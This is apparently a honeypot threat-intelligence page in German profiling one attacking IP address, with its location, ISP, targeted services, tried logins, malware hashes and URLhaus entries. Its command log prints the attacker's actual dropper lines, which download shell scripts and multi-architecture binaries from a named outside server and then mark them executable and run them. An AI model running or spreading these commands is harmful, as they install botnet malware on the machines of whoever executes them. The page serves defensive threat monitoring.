Aktive Bedrohung • MITTEL

176.65.148.45

Herkunftsland🇳🇱 Paises Bajos

Erste Erkennung15.1.2026

Letzte Aktivitat15.1.2026

ISPPfcloud UG (haftungsbeschrankt)

🎯

Gesamtangriffe

🔌

Ports

📡

Angriffsarten

🦠

Malware

Geolokalisierung

Land: 🇳🇱 Paises Bajos
Stadt: Eygelshoven
ASN: AS51396
ISP: Pfcloud UG (haftungsbeschrankt)

Angriffsarten

adbhoney

cowrie

Angegriffene Ports

555523

Zugehorige Malware

eef45f8fd300a217d20e...→b1f0280e9207cecace9d...→d714978225984dba9118...→9976eb54ab76f9f988e0...→187a34db7011c6e67139...→

Versuchte Anmeldedaten

🔐admin/admin

🔐root/admin

Ausgefuhrte Befehle

cd /data/local/tmp/; busybox wget http://82.221.139.173:3712/w.sh; sh w.sh; curl http://82.221.139.173:3712/c.sh; sh c.sh; wget http://82.221.139.173:3712/wget.sh; sh wget.sh; curl http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox wget http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox curl http://82.221.139.173:3712/wget.sh; sh wget.sh

$cd /tmp;rm -rf RANGER2x

$wget http://82.221.139.173:3712/bins/systemx64.arm;chmod 777 systemx64.arm;./systemx64.arm TELNETarm2x

$rm -rf RANGER1x

$wget http://82.221.139.173:3712/bins/systemx64.spc;chmod 777 systemx64.spc;./systemx64.spc TELNETspc1x

$wget http://82.221.139.173:3712/bins/systemx64.sh4;chmod 777 systemx64.sh4;./systemx64.sh4 TELNETsh41x

$wget http://82.221.139.173:3712/bins/systemx64.arm7;chmod 777 systemx64.arm7;./systemx64.arm7 TELNETarm71x

$wget http://82.221.139.173:3712/bins/systemx64.x86;chmod 777 systemx64.x86;./systemx64.x86 TELNETx861x

$wget http://82.221.139.173:3712/bins/systemx64.mpsl;chmod 777 systemx64.mpsl;./systemx64.mpsl TELNETmpsl1x

URLhaus Intel3 URLsabuse.ch

Diese IP hat folgende bekannte bosartige URLs verwendet:

http://82.221.139.173:3712/c.sh

offlinemalware_downloadgeofencedopendirsh

http://82.221.139.173:3712/wget.sh

offlinemalware_downloadgeofencedopendirsh

http://82.221.139.173:3712/w.sh

offlinemalware_downloadgeofencedopendirsh

Risikobewertung

/100

NiedrigMittelHochKritisch